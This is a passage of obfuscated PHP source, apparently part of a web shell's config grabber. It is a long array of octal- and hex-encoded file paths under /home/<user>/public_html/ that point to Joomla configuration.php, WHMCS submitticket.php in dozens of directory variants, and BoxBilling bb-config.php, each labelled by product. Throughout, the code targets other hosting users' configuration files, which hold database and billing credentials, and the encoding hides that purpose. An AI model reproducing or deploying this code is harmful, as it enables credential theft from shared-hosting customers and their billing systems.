"\57\x68\157\155\x65\x2f{$user_con}\57\x70\165\142\x6c\151\x63\137\x68\x74\155\x6c\57\x6e\145\x77\57\143\x6f\x6e\x66\x69\147\165\x72\141\x74\151\x6f\156\x2e\160\x68\x70" => "\x4a\x6f\157\x6d\x6c\x61", "\x2f\150\157\155\145\x2f{$user_con}\57\160\x75\x62\154\x69\x63\x5f\150\164\155\154\57\127\110\x4d\x43\x53\x2f\x73\165\x62\x6d\151\x74\x74\151\143\x6b\145\164\56\x70\x68\160" => "\127\x48\115\x43\x53", "\x2f\150\x6f\155\x65\57{$user_con}\57\160\x75\142\x6c\x69\x63\x5f\x68\164\155\154\57\167\150\x6d\x63\x73\61\57\163\x75\x62\155\151\164\x74\151\143\x6b\145\x74\x2e\160\150\160" => "\127\110\115\103\x53", "\x2f\x68\157\155\145\x2f{$user_con}\57\x70\x75\142\154\x69\x63\137\150\164\155\x6c\57\x57\150\x6d\x63\x73\57\163\165\142\x6d\x69\x74\164\151\x63\x6b\145\x74\56\160\150\160" => "\x57\110\115\103\x53", "\x2f\150\157\155\145\57{$user_con}\x2f\160\x75\x62\x6c\151\x63\137\150\164\x6d\154\x2f\x77\x68\155\x63\163\57\163\165\x62\155\x69\x74\164\151\x63\153\145\164\56\160\x68\160" => "\x57\x48\x4d\x43\123", "\57\x68\157\155\x65\x2f{$user_con}\x2f\x70\165\x62\x6c\x69\x63\137\x68\x74\x6d\x6c\x2f\x77\x68\155\143\163\x2f\x73\x75\142\155\151\164\x74\151\143\x6b\145\164\x2e\160\150\160" => "\x57\x48\x4d\x43\123", "\x2f\x68\157\155\x65\x2f{$user_con}\57\160\x75\x62\x6c\151\x63\x5f\x68\x74\x6d\x6c\x2f\x57\110\115\x43\57\163\x75\142\155\x69\x74\164\151\x63\153\145\x74\x2e\160\x68\x70" => "\x57\110\x4d\x43\123", "\x2f\150\x6f\155\145\x2f{$user_con}\x2f\160\x75\142\154\151\143\x5f\x68\x74\x6d\154\57\127\150\155\143\57\x73\x75\x62\155\x69\x74\164\x69\x63\x6b\145\x74\x2e\160\x68\160" => "\127\110\x4d\x43\123", "\57\x68\157\155\x65\x2f{$user_con}\57\160\165\142\154\x69\143\137\150\164\155\154\x2f\167\150\155\x63\57\x73\165\x62\155\x69\164\x74\151\143\x6b\x65\164\56\x70\x68\x70" => "\x57\110\x4d\x43\x53", "\x2f\150\157\155\145\x2f{$user_con}\x2f\160\x75\x62\154\x69\143\137\150\164\x6d\154\57\127\110\115\57\163\x75\142\x6d\x69\164\164\151\143\153\x65\x74\56\160\x68\x70" => "\127\x48\x4d\x43\123", "\57\150\157\155\145\57{$user_con}\x2f\x70\x75\x62\x6c\151\143\x5f\150\164\x6d\154\x2f\x57\x68\x6d\57\x73\165\x62\x6d\151\x74\x74\151\143\x6b\145\164\x2e\160\150\x70" => "\127\x48\115\x43\123", "\x2f\150\157\x6d\145\57{$user_con}\x2f\x70\165\x62\154\x69\143\x5f\150\x74\155\154\57\167\150\x6d\x2f\163\165\x62\155\151\x74\x74\151\143\x6b\145\164\x2e\160\x68\160" => "\127\x48\115\x43\123", "\x2f\150\x6f\155\x65\x2f{$user_con}\57\x70\x75\142\x6c\151\143\137\x68\x74\155\154\x2f\110\x4f\123\x54\57\x73\165\142\x6d\151\164\164\x69\143\x6b\145\164\x2e\x70\150\x70" => "\x57\110\x4d\x43\x53", "\57\x68\x6f\155\145\x2f{$user_con}\x2f\x70\x75\142\x6c\x69\143\137\x68\164\155\x6c\57\x48\157\163\x74\x2f\163\165\x62\x6d\151\x74\164\151\143\x6b\145\x74\56\160\150\160" => "\x57\x48\x4d\x43\x53", "\x2f\x68\157\x6d\x65\57{$user_con}\x2f\160\165\142\154\151\x63\137\x68\164\x6d\154\x2f\150\x6f\x73\x74\57\163\165\x62\x6d\151\164\x74\151\x63\153\x65\x74\56\160\x68\x70" => "\x57\110\115\x43\123", "\57\x68\157\x6d\145\57{$user_con}\57\160\x75\142\x6c\151\x63\x5f\x68\164\155\154\57\x53\x55\x50\120\117\122\124\105\123\57\163\165\142\x6d\x69\164\164\x69\143\153\145\x74\56\160\x68\x70" => "\x57\110\x4d\x43\123", "\x2f\x68\157\155\x65\x2f{$user_con}\57\x70\165\x62\154\151\x63\x5f\x68\164\x6d\x6c\57\123\165\x70\x70\x6f\x72\164\x65\163\x2f\163\165\x62\x6d\x69\x74\164\x69\x63\153\x65\164\56\x70\150\x70" => "\127\110\115\x43\x53", "\57\150\157\155\x65\x2f{$user_con}\57\160\165\x62\154\151\x63\x5f\x68\164\155\x6c\x2f\x73\165\160\x70\x6f\162\x74\x65\x73\57\163\x75\x62\x6d\x69\x74\164\151\143\153\x65\164\56\x70\x68\x70" => "\127\x48\x4d\x43\x53", "\x2f\x68\157\x6d\x65\x2f{$user_con}\57\x70\x75\x62\x6c\151\143\x5f\x68\164\155\x6c\57\x64\x6f\155\x61\x69\x6e\x73\x2f\163\x75\142\155\x69\164\x74\x69\x63\153\145\164\x2e\x70\x68\x70" => "\127\x48\115\x43\x53", "\x2f\x68\x6f\155\145\x2f{$user_con}\57\x70\165\142\154\x69\143\137\150\x74\x6d\154\57\144\x6f\x6d\x61\x69\156\x2f\x73\165\142\155\x69\x74\164\151\x63\x6b\145\164\56\x70\150\160" => "\127\110\115\x43\x53", "\x2f\150\x6f\x6d\x65\x2f{$user_con}\x2f\160\165\142\154\151\143\137\x68\x74\155\154\x2f\x48\157\x73\164\151\x6e\147\57\x73\x75\x62\155\151\x74\164\x69\143\153\x65\x74\56\160\x68\160" => "\127\110\115\x43\x53", "\57\150\157\155\145\x2f{$user_con}\57\160\165\x62\x6c\151\x63\x5f\150\x74\155\x6c\57\x48\117\x53\x54\111\116\x47\57\x73\165\x62\x6d\x69\x74\x74\x69\143\x6b\x65\x74\56\x70\x68\x70" => "\127\110\x4d\103\x53", "\57\x68\157\x6d\145\57{$user_con}\57\x70\165\x62\x6c\x69\x63\137\150\164\155\x6c\57\x68\157\163\164\x69\156\147\x2f\x73\165\142\155\x69\164\x74\151\143\153\145\x74\x2e\160\150\x70" => "\127\x48\115\x43\x53", "\x2f\150\157\155\x65\x2f{$user_con}\x2f\160\x75\142\154\151\x63\137\150\x74\155\154\57\x43\x41\122\124\x2f\x73\165\142\x6d\151\164\x74\x69\x63\x6b\x65\164\56\160\x68\160" => "\x57\110\x4d\103\123", "\57\x68\x6f\155\x65\57{$user_con}\x2f\x70\x75\x62\154\151\x63\x5f\x68\x74\155\x6c\x2f\x43\141\x72\164\57\163\x75\x62\155\151\x74\x74\x69\143\153\145\x74\x2e\160\x68\160" => "\127\x48\115\103\123", "\57\150\157\x6d\145\x2f{$user_con}\x2f\x70\165\x62\154\151\143\x5f\x68\164\155\154\x2f\143\141\x72\164\57\x73\165\x62\155\151\164\x74\151\x63\153\145\164\x2e\x70\150\x70" => "\x57\110\115\103\x53", "\x2f\x68\157\x6d\145\57{$user_con}\x2f\160\x75\x62\154\x69\x63\x5f\150\x74\155\154\x2f\117\x52\x44\105\x52\x2f\x73\x75\142\155\151\x74\x74\x69\143\153\145\164\x2e\160\150\x70" => "\x57\110\x4d\103\123", "\57\x68\157\x6d\145\x2f{$user_con}\57\x70\x75\142\154\x69\x63\x5f\x68\x74\155\154\57\117\x72\144\x65\162\x2f\163\165\x62\155\x69\164\164\151\x63\153\x65\x74\56\x70\150\160" => "\x57\110\x4d\103\x53", "\57\x68\157\x6d\x65\57{$user_con}\57\x70\165\142\154\151\x63\x5f\x68\164\155\154\57\157\162\x64\145\x72\57\163\x75\142\155\151\164\164\x69\x63\x6b\x65\164\x2e\x70\x68\x70" => "\x57\110\115\x43\123", "\x2f\x68\157\155\x65\x2f{$user_con}\x2f\160\165\x62\x6c\x69\143\137\150\164\155\x6c\x2f\103\114\111\x45\116\x54\57\163\165\x62\155\x69\x74\164\x69\x63\153\145\x74\x2e\x70\x68\160" => "\x57\110\115\103\123", "\x2f\150\x6f\155\x65\x2f{$user_con}\57\160\x75\x62\x6c\151\x63\137\150\164\155\x6c\x2f\103\154\x69\145\156\164\57\163\x75\142\x6d\x69\x74\164\x69\143\x6b\x65\164\56\x70\x68\x70" => "\x57\110\115\103\x53", "\57\150\x6f\x6d\145\57{$user_con}\57\x70\x75\142\154\151\x63\x5f\150\164\x6d\x6c\x2f\143\x6c\x69\x65\x6e\x74\x2f\163\x75\142\x6d\x69\164\x74\151\143\x6b\145\164\x2e\160\x68\x70" => "\x57\x48\115\x43\123", "\x2f\150\x6f\x6d\x65\57{$user_con}\x2f\160\x75\x62\x6c\151\x63\137\x68\x74\x6d\154\x2f\103\x4c\111\105\x4e\124\101\122\105\101\x2f\x73\165\142\x6d\x69\164\164\x69\143\153\x65\164\x2e\x70\x68\160" => "\127\110\115\x43\123", "\x2f\x68\x6f\x6d\x65\x2f{$user_con}\57\160\165\x62\x6c\151\x63\137\x68\x74\x6d\x6c\57\x43\x6c\151\x65\156\x74\x61\x72\x65\x61\57\x73\x75\142\155\x69\164\x74\151\143\x6b\x65\164\56\x70\x68\x70" => "\127\110\x4d\103\x53", "\57\x68\x6f\155\x65\x2f{$user_con}\x2f\160\x75\x62\154\151\143\137\150\x74\155\x6c\57\x63\x6c\x69\145\156\x74\141\x72\145\141\57\x73\165\142\155\151\164\164\151\x63\x6b\x65\164\x2e\x70\150\x70" => "\127\x48\x4d\x43\123", "\x2f\x68\157\x6d\x65\x2f{$user_con}\x2f\x70\x75\142\x6c\151\x63\x5f\150\x74\155\x6c\57\x53\125\120\x50\117\x52\124\57\163\165\142\155\x69\x74\164\151\x63\153\x65\x74\x2e\160\x68\x70" => "\127\110\x4d\x43\x53", "\x2f\150\x6f\155\x65\x2f{$user_con}\57\x70\x75\x62\x6c\151\143\x5f\x68\164\155\x6c\57\x53\165\x70\x70\x6f\162\x74\57\x73\x75\142\155\151\164\164\151\143\x6b\x65\164\56\160\x68\x70" => "\x57\110\x4d\x43\123", "\x2f\150\157\155\145\x2f{$user_con}\x2f\160\x75\142\154\x69\x63\x5f\150\164\155\154\x2f\x73\x75\x70\x70\x6f\162\x74\57\x73\165\142\155\x69\164\164\x69\143\x6b\145\164\56\x70\150\x70" => "\127\x48\115\x43\123", "\x2f\150\157\155\x65\57{$user_con}\x2f\x70\165\x62\154\151\x63\x5f\150\164\155\154\x2f\x42\x49\114\114\x49\x4e\x47\x2f\x73\x75\142\x6d\151\164\164\151\x63\x6b\x65\x74\x2e\160\x68\x70" => "\127\x48\115\x43\x53", "\57\x68\157\x6d\145\x2f{$user_con}\x2f\160\165\x62\x6c\151\143\x5f\150\x74\x6d\154\57\x42\151\x6c\x6c\x69\156\147\x2f\163\165\142\155\x69\164\x74\x69\143\153\x65\x74\x2e\160\x68\x70" => "\x57\x48\115\103\x53", "\x2f\150\x6f\x6d\x65\57{$user_con}\x2f\160\x75\142\154\x69\143\137\x68\164\155\x6c\57\x62\x69\x6c\154\x69\156\147\57\163\165\x62\x6d\151\x74\164\151\143\x6b\145\x74\x2e\x70\x68\160" => "\x57\110\115\x43\x53", "\x2f\150\x6f\155\x65\57{$user_con}\57\x70\x75\142\x6c\x69\x63\137\x68\164\x6d\x6c\57\x42\125\131\57\x73\165\x62\155\x69\x74\164\151\143\153\x65\164\56\160\x68\x70" => "\127\x48\x4d\x43\123", "\x2f\x68\157\155\x65\57{$user_con}\x2f\x70\165\x62\154\151\143\137\150\164\x6d\x6c\x2f\102\x75\x79\x2f\163\165\142\x6d\x69\x74\x74\x69\x63\153\145\164\56\x70\x68\x70" => "\127\110\x4d\103\123", "\x2f\150\157\x6d\x65\x2f{$user_con}\57\x70\x75\x62\x6c\151\x63\x5f\x68\164\155\x6c\x2f\x62\165\x79\x2f\x73\x75\142\155\x69\164\x74\x69\x63\x6b\x65\164\56\160\150\160" => "\x57\x48\x4d\103\123", "\57\150\x6f\x6d\145\x2f{$user_con}\57\160\x75\x62\x6c\151\x63\x5f\150\164\155\x6c\57\115\101\116\x41\x47\x45\57\163\x75\x62\x6d\151\x74\164\151\143\153\145\164\56\160\150\160" => "\x57\x48\115\103\123", "\x2f\150\x6f\x6d\x65\x2f{$user_con}\x2f\160\x75\142\x6c\x69\x63\137\x68\x74\x6d\x6c\x2f\x4d\x61\156\x61\x67\145\x2f\x73\x75\x62\155\151\x74\164\x69\x63\153\x65\x74\x2e\x70\150\160" => "\x57\110\115\103\x53", "\x2f\150\x6f\155\x65\57{$user_con}\x2f\x70\x75\142\154\151\143\137\150\164\x6d\154\x2f\155\141\x6e\141\147\145\57\163\165\142\155\151\164\x74\x69\x63\153\145\164\56\x70\x68\160" => "\127\110\115\103\123", "\57\x68\157\155\x65\57{$user_con}\x2f\160\x75\142\154\x69\x63\137\150\x74\x6d\154\57\103\x4c\x49\105\x4e\124\123\x55\x50\x50\117\x52\x54\57\x73\x75\142\155\151\x74\x74\x69\143\x6b\x65\164\x2e\x70\150\160" => "\127\x48\x4d\x43\x53", "\57\150\157\x6d\145\x2f{$user_con}\x2f\160\165\x62\x6c\151\x63\137\150\164\155\154\x2f\x43\x6c\x69\x65\156\164\123\165\x70\160\157\x72\164\57\163\165\x62\155\151\164\x74\151\x63\153\x65\164\56\x70\150\160" => "\x57\110\115\x43\x53", "\57\x68\x6f\x6d\145\x2f{$user_con}\x2f\160\x75\142\x6c\151\x63\137\x68\x74\x6d\x6c\57\x43\154\151\145\x6e\164\163\165\160\160\157\x72\164\57\163\x75\x62\x6d\x69\x74\164\x69\143\x6b\145\x74\x2e\x70\150\x70" => "\127\x48\x4d\x43\x53", "\x2f\x68\x6f\155\x65\x2f{$user_con}\x2f\160\x75\x62\154\x69\143\137\x68\x74\x6d\154\x2f\143\x6c\151\x65\x6e\x74\x73\165\x70\160\x6f\x72\164\x2f\x73\165\142\155\x69\x74\164\151\143\x6b\145\164\56\160\x68\x70" => "\x57\110\x4d\103\123", "\57\150\x6f\155\x65\57{$user_con}\x2f\x70\165\x62\x6c\x69\143\x5f\x68\x74\155\154\57\103\x48\x45\103\x4b\117\125\124\x2f\x73\x75\x62\155\x69\164\x74\x69\x63\153\x65\x74\x2e\x70\x68\x70" => "\x57\110\115\x43\123", "\57\150\157\155\x65\57{$user_con}\x2f\160\x75\142\154\151\x63\137\x68\164\x6d\x6c\57\103\x68\145\143\x6b\x6f\x75\x74\57\163\x75\142\155\151\x74\164\x69\143\x6b\145\164\56\160\150\x70" => "\x57\110\x4d\103\x53", "\57\150\x6f\x6d\145\57{$user_con}\57\160\x75\x62\x6c\x69\x63\137\x68\x74\x6d\x6c\57\x63\x68\145\x63\x6b\157\165\x74\57\x73\165\142\x6d\x69\x74\x74\x69\x63\153\x65\x74\56\x70\x68\160" => "\127\x48\115\103\x53", "\x2f\150\x6f\155\145\57{$user_con}\x2f\x70\x75\142\154\151\143\137\x68\164\x6d\154\x2f\x42\x49\x4c\114\111\x4e\x47\x53\x2f\163\x75\x62\155\x69\x74\164\x69\x63\153\145\164\56\x70\150\x70" => "\127\110\x4d\x43\x53", "\x2f\150\157\155\145\57{$user_con}\x2f\x70\x75\142\154\151\x63\137\150\164\x6d\x6c\57\x42\x69\x6c\x6c\x69\x6e\x67\x73\x2f\163\165\142\x6d\x69\x74\164\x69\x63\x6b\x65\164\56\160\x68\160" => "\127\110\x4d\103\123", "\57\150\x6f\155\145\x2f{$user_con}\x2f\x70\x75\x62\x6c\151\143\x5f\150\164\x6d\x6c\57\x62\x69\154\154\151\156\x67\x73\x2f\x73\165\142\155\x69\164\x74\x69\143\x6b\145\164\56\160\150\x70" => "\127\110\x4d\x43\123", "\57\150\x6f\155\x65\57{$user_con}\57\160\165\x62\154\151\143\137\150\x74\x6d\154\x2f\102\101\x53\113\x45\x54\57\x73\x75\x62\x6d\151\164\x74\x69\143\x6b\145\164\56\x70\150\160" => "\127\x48\x4d\103\x53", "\57\150\157\x6d\x65\x2f{$user_con}\x2f\x70\165\142\154\151\x63\137\150\x74\x6d\x6c\57\102\141\x73\153\145\x74\x2f\x73\x75\142\x6d\x69\164\x74\x69\x63\x6b\145\164\56\160\x68\x70" => "\x57\x48\115\103\x53", "\x2f\150\157\155\145\57{$user_con}\x2f\160\x75\x62\154\x69\x63\x5f\150\164\155\154\x2f\x62\141\163\153\x65\x74\x2f\x73\x75\142\x6d\x69\164\164\151\143\x6b\x65\x74\x2e\160\x68\160" => "\x57\110\115\103\x53", "\57\150\x6f\x6d\145\57{$user_con}\x2f\x70\165\142\x6c\x69\143\137\x68\x74\x6d\154\x2f\x53\x45\103\x55\122\105\x2f\163\165\x62\155\x69\164\164\x69\143\153\x65\x74\56\160\150\160" => "\127\x48\115\x43\123", "\x2f\150\x6f\x6d\x65\57{$user_con}\x2f\x70\165\142\154\151\x63\137\150\164\155\x6c\x2f\x53\145\x63\165\x72\x65\57\x73\x75\x62\155\151\x74\164\x69\143\153\145\x74\x2e\x70\150\160" => "\127\110\115\x43\x53", "\x2f\150\x6f\155\145\x2f{$user_con}\x2f\x70\x75\142\154\x69\x63\137\150\164\155\154\x2f\163\x65\143\x75\x72\145\x2f\163\x75\142\x6d\x69\164\x74\x69\143\x6b\145\x74\x2e\x70\x68\160" => "\x57\x48\x4d\103\123", "\57\150\x6f\x6d\x65\57{$user_con}\x2f\x70\x75\142\x6c\x69\143\137\x68\164\155\x6c\x2f\123\x41\x4c\x45\x53\57\163\x75\x62\155\151\x74\164\x69\x63\153\145\x74\56\160\150\160" => "\x57\110\x4d\x43\123", "\x2f\150\157\155\x65\x2f{$user_con}\57\x70\165\x62\154\151\143\x5f\x68\x74\155\x6c\x2f\x53\x61\x6c\145\x73\x2f\163\x75\142\x6d\x69\164\x74\x69\143\153\x65\164\56\160\x68\160" => "\x57\x48\x4d\x43\123", "\57\150\x6f\x6d\x65\57{$user_con}\57\x70\165\x62\x6c\x69\x63\137\x68\x74\x6d\154\x2f\x73\x61\154\x65\x73\x2f\x73\x75\142\x6d\x69\164\164\151\143\153\x65\164\56\160\x68\160" => "\x57\110\115\x43\123", "\57\150\x6f\x6d\x65\x2f{$user_con}\57\160\165\142\154\x69\x63\x5f\150\164\155\154\x2f\102\x49\114\114\57\x73\165\142\x6d\151\x74\164\x69\143\x6b\x65\164\x2e\160\150\160" => "\127\x48\115\103\x53", "\57\x68\x6f\x6d\145\57{$user_con}\x2f\160\x75\x62\x6c\x69\143\x5f\x68\164\x6d\x6c\57\102\x69\154\154\x2f\x73\165\x62\x6d\x69\x74\x74\x69\x63\153\145\164\x2e\160\150\160" => "\x57\110\x4d\103\x53", "\57\150\157\x6d\145\x2f{$user_con}\x2f\x70\x75\x62\x6c\x69\143\137\150\164\x6d\154\x2f\142\151\154\154\57\x73\165\142\155\x69\164\x74\151\143\153\145\x74\56\x70\x68\160" => "\127\110\x4d\x43\x53", "\x2f\150\157\155\145\x2f{$user_con}\x2f\x70\165\x62\x6c\x69\143\137\x68\x74\x6d\154\57\120\x55\x52\x43\110\x41\123\x45\x2f\163\x75\x62\155\x69\164\x74\151\x63\x6b\x65\164\x2e\x70\x68\x70" => "\x57\x48\115\103\123", "\57\x68\157\x6d\x65\x2f{$user_con}\57\x70\x75\142\154\x69\143\x5f\x68\164\155\x6c\57\120\165\x72\x63\150\x61\163\145\x2f\163\165\x62\155\151\164\164\151\x63\153\x65\164\x2e\x70\x68\x70" => "\x57\110\x4d\x43\x53", "\57\x68\x6f\155\x65\57{$user_con}\x2f\160\165\142\x6c\151\143\137\150\x74\155\154\57\160\x75\x72\143\x68\141\163\x65\x2f\x73\x75\x62\155\151\x74\164\x69\x63\153\145\x74\x2e\160\x68\160" => "\127\x48\115\x43\123", "\x2f\150\x6f\155\x65\x2f{$user_con}\x2f\160\165\x62\x6c\x69\x63\x5f\x68\164\x6d\154\x2f\x41\x43\x43\117\x55\116\124\x2f\163\165\x62\x6d\x69\164\164\151\x63\153\145\164\x2e\x70\x68\x70" => "\127\x48\x4d\x43\x53", "\x2f\150\x6f\155\145\57{$user_con}\57\160\165\142\x6c\151\143\x5f\x68\164\x6d\x6c\57\x41\x63\143\x6f\x75\x6e\x74\57\163\165\x62\155\151\x74\164\x69\x63\153\145\164\56\x70\150\160" => "\127\110\x4d\x43\x53", "\x2f\x68\157\x6d\145\x2f{$user_con}\57\x70\x75\142\x6c\151\143\137\x68\x74\155\154\x2f\141\143\x63\x6f\165\x6e\164\57\163\165\142\155\151\x74\x74\151\143\x6b\x65\164\x2e\160\150\160" => "\127\x48\x4d\103\123", "\57\x68\x6f\155\145\57{$user_con}\x2f\x70\165\142\154\151\x63\137\x68\x74\x6d\154\x2f\125\123\105\122\57\x73\x75\x62\x6d\x69\164\164\151\143\153\145\x74\x2e\160\x68\x70" => "\x57\x48\115\103\123", "\57\150\x6f\155\145\57{$user_con}\x2f\x70\165\x62\x6c\x69\143\x5f\150\164\155\154\57\x55\163\145\162\57\163\165\x62\x6d\151\164\x74\151\x63\153\x65\x74\x2e\160\150\x70" => "\x57\x48\115\x43\123", "\x2f\150\x6f\155\145\57{$user_con}\x2f\x70\165\142\154\x69\x63\137\x68\x74\155\154\x2f\165\x73\145\162\57\x73\x75\142\155\151\x74\x74\x69\143\x6b\145\164\x2e\x70\150\160" => "\127\110\x4d\103\x53", "\x2f\x68\157\x6d\x65\x2f{$user_con}\57\x70\x75\x62\154\x69\143\x5f\150\x74\155\154\x2f\x43\x4c\111\x45\116\x54\x53\57\x73\x75\x62\155\151\164\164\x69\143\x6b\145\x74\x2e\160\x68\160" => "\x57\110\x4d\x43\123", "\x2f\x68\157\x6d\x65\x2f{$user_con}\x2f\x70\165\142\x6c\151\x63\x5f\x68\x74\x6d\154\x2f\x43\154\x69\x65\x6e\x74\163\57\x73\x75\x62\x6d\151\164\x74\151\143\153\145\164\x2e\x70\x68\x70" => "\127\110\x4d\x43\x53", "\x2f\x68\157\x6d\145\x2f{$user_con}\57\x70\x75\x62\x6c\x69\143\x5f\x68\164\x6d\154\x2f\x63\154\151\x65\x6e\164\x73\x2f\163\x75\142\155\x69\164\164\x69\143\x6b\x65\164\x2e\x70\x68\x70" => "\127\x48\x4d\x43\x53", "\x2f\150\x6f\155\x65\57{$user_con}\x2f\160\x75\x62\x6c\151\x63\x5f\150\164\155\x6c\57\102\x49\114\114\x49\116\x47\123\x2f\x73\x75\x62\x6d\x69\x74\x74\151\x63\x6b\145\x74\56\x70\x68\160" => "\x57\110\x4d\x43\x53", "\57\150\x6f\x6d\145\x2f{$user_con}\57\160\x75\x62\154\x69\143\x5f\150\164\155\154\x2f\x42\151\154\154\x69\x6e\147\163\x2f\163\165\x62\155\151\164\164\151\143\153\x65\x74\56\160\150\x70" => "\127\x48\115\x43\123", "\57\x68\157\x6d\145\x2f{$user_con}\x2f\x70\x75\142\x6c\x69\143\137\150\164\155\154\57\x62\x69\154\x6c\151\x6e\147\163\57\163\165\142\155\151\164\x74\151\143\x6b\x65\x74\56\x70\x68\x70" => "\x57\110\115\x43\x53", "\57\x68\157\155\145\57{$user_con}\57\160\x75\x62\x6c\x69\x63\x5f\150\x74\x6d\154\57\115\x59\x2f\x73\165\142\x6d\151\x74\164\151\143\x6b\x65\x74\x2e\160\150\160" => "\x57\110\x4d\x43\x53", "\57\150\x6f\x6d\x65\x2f{$user_con}\x2f\x70\165\x62\x6c\151\x63\x5f\150\x74\x6d\x6c\x2f\x4d\171\x2f\x73\165\142\x6d\x69\164\x74\151\143\x6b\x65\x74\x2e\x70\x68\160" => "\127\x48\x4d\x43\123", "\x2f\150\157\155\x65\57{$user_con}\x2f\x70\165\142\x6c\151\x63\137\x68\164\155\154\57\155\x79\57\163\x75\x62\x6d\151\164\164\x69\x63\153\x65\164\56\x70\150\160" => "\x57\x48\x4d\x43\x53", "\x2f\x68\x6f\x6d\x65\57{$user_con}\57\x70\x75\142\x6c\x69\143\137\x68\x74\x6d\154\x2f\x73\x65\x63\x75\x72\145\57\167\150\155\57\x73\x75\x62\x6d\151\x74\x74\x69\x63\153\x65\x74\56\x70\150\x70" => "\127\x48\x4d\x43\x53", "\57\150\x6f\155\x65\x2f{$user_con}\57\x70\x75\x62\154\151\143\x5f\150\x74\155\154\57\x73\x65\x63\x75\x72\145\x2f\167\150\x6d\143\163\57\x73\x75\142\155\x69\164\164\151\x63\153\145\164\x2e\x70\x68\x70" => "\x57\x48\115\x43\x53", "\x2f\x68\x6f\155\145\x2f{$user_con}\x2f\160\x75\142\154\x69\143\x5f\150\x74\155\x6c\x2f\x70\x61\156\x65\154\x2f\x73\x75\142\x6d\151\164\x74\x69\143\x6b\x65\164\x2e\x70\150\160" => "\x57\x48\x4d\x43\x53", "\57\x68\x6f\x6d\145\x2f{$user_con}\x2f\x70\x75\142\x6c\151\143\x5f\x68\x74\155\154\57\x63\x6c\x69\145\x6e\x74\145\163\57\x73\165\142\x6d\x69\164\164\151\143\x6b\x65\164\x2e\x70\x68\160" => "\127\x48\115\x43\123", "\57\x68\157\x6d\145\x2f{$user_con}\x2f\x70\x75\x62\154\x69\143\x5f\150\x74\x6d\154\x2f\x63\154\x69\x65\x6e\x74\145\57\x73\x75\142\155\151\x74\x74\x69\143\x6b\145\164\56\160\150\x70" => "\x57\110\115\x43\123", "\57\150\x6f\155\x65\57{$user_con}\x2f\x70\x75\x62\x6c\151\143\x5f\x68\x74\155\154\57\x73\x75\160\160\x6f\162\x74\57\157\x72\144\x65\162\57\x73\x75\x62\155\x69\x74\x74\151\x63\x6b\145\164\56\x70\x68\x70" => "\x57\x48\115\x43\123", "\x2f\150\157\x6d\145\57{$user_con}\x2f\x70\x75\x62\154\x69\x63\137\x68\164\155\154\57\x62\142\55\143\157\x6e\146\x69\x67\x2e\160\150\160" => "\102\157\x78\102\x69\154\154\151\x6e\147", "\57\x68\157\x6d\145\57{$user_con}\57\160\165\142\154\151\143\x5f\150\x74\x6d\x6c\x2f\142\157\x78\142\x69\154\x6c\x69\156\147\57\x62\142\55\143\x6f\156\x66\151\x67\x2e\160\150\x70" => "\x42\157\x78\x42\151\154\154\x69\x6e\147", "\x2f\x68\157\x6d\x65\x2f{$user_con}\57\160\165\x62\154\151\143\137\x68\x74\x6d\x6c\x2f\142\x6f\x78\57\x62\x62\x2d\143\157\156\146\x69\x67\x2e\x70\150\160" => "\x42\157\170\102\x69\x6c\154\x69\156\x67", "\57\x68\x6f\x6d\145\x2f{$user_con}\57\x70\x75\142\154\x69\143\x5f\150\x74\155\x6c\57\x68\x6f\x73\164\x2f\x62\x62\55\143\157\x6e\x66\x69\147\56\160\x68\160" => "\x42\x6f\170\x42\151\154\154\151\156\x67", "\x2f\150\157\x6d\145\57{$user_con}\x2f\x70\x75\142\x6c\x69\x63\137\150\x74\155\154\57\x48\x6f\163\164\57\x62\x62\55\x63\x6f\x6e\x66\151\x67\56\x70\x68\x70" => "\102\157\x78\102\151\x6c\x6c\x69\156\x67", "\57\x68\157\x6d\145\x2f{$user_con}\x2f\160\165\x62\154\x69\143\137\x68\164\155\154\57\x73\165\160\160\x6f\x72\x74\x65\x73\x2f\142\x62\55\143\x6f\x6e\146\151\147\56\160\150\x70" => "\102\x6f\170\102\151\154\154\151\x6e\x67", "\x2f\x68\x6f\155\145\57{$user_con}\x2f\160\165\x62\154\151\143\137\x68\164\x6d\154\57\x73\x75\x70\x70\157\x72\x74\57\142\142\55\143\x6f\156\146\151\x67\x2e\160\150\160" => "\x42\x6f\x78\102\151\x6c\154\x69\156\147", "\57\x68\x6f\x6d\x65\x2f{$user_con}\x2f\x70\x75\142\154\151\x63\137\150\164\155\x6c\x2f\x68\157\x73\x74\x69\156\x67\x2f\142\142\x2d\143\157\x6e\x66\151\x67\x2e\x70\150\x70" => "\x42\157\170\102\151\x6c\154\x69\156\x67", "\x2f\x68\157\155\x65\57{$user_con}\57\x70\165\142\154\x69\x63\137\150\x74\x6d\x6c\x2f\143\x61\x72\164\57\142\142\x2d\143\x6f\156\146\x69\147\56\x70\150\160" => "\x42\157\170\x42\x69\x6c\154\x69\156\147", "\x2f\x68\x6f\x6d\x65\57{$user_con}\57\x70\x75\142\154\x69\143\x5f\150\164\155\154\x2f\157\162\144\x65\x72\57\142\x62\55\143\x6f\156\x66\151\147\x2e\x70\x68\160" => "\102\157\x78\102\151\x6c\154\x69\156\x67", "\57\x68\x6f\x6d\145\x2f{$user_con}\x2f\x70\165\142\x6c\x69\143\x5f\x68\164\x6d\154\57\x63\x6c\x69\145\x6e\164\x2f\142\x62\x2d\x63\x6f\156\146\x69\x67\x2e\x70\150\x70" => "\102\157\x78\102\x69\x6c\154\x69\x6e\x67", "\57\x68\157\x6d\145\x2f{$user_con}\57\x70\x75\142\x6c\x69\x63\x5f\150\x74\x6d\x6c\x2f\143\x6c\x69\145\x6e\x74\x73\57\x62\x62\55\143\157\x6e\x66\151\147\56\160\150\160" => "\102\x6f\170\102\x69\x6c\154\151\156\x67", "\57\150\x6f\155\x65\x2f{$user_con}\x2f\x70\165\142\x6c\151\x63\137\150\x74\155\x6c\57\x63\x6c\151\x65\156\164\145\x2f\142\x62\55\x63\157\156\146\x69\147\x2e\160\x68\160" => "\102\157\170\x42\151\154\154\x69\156\147", "\57\x68\x6f\155\x65\57{$user_con}\x2f\160\165\142\x6c\x69\143\x5f\x68\164\x6d\154\57\143\x6c\151\145\156\164\145\163\x2f\142\142\55\143\157\x6e\146\151\147\x2e\160\x68\x70" => "\102\x6f\x78\x42\x69\x6c\x6c\x69\x6e\147", "\57\x68\x6f\x6d\145\57{$user_con}\57\160\x75\x62\154\151\143\137\x68\x74\x6d\x6c\57\142\x69\x6c\154\151\156\x67\57\x62\x62\x2d\143\157\x6e\146\x69\x67\x2e\x70\x68\x70" => "\102\157\x78\102\x69\154\154\x69\x6e\147", 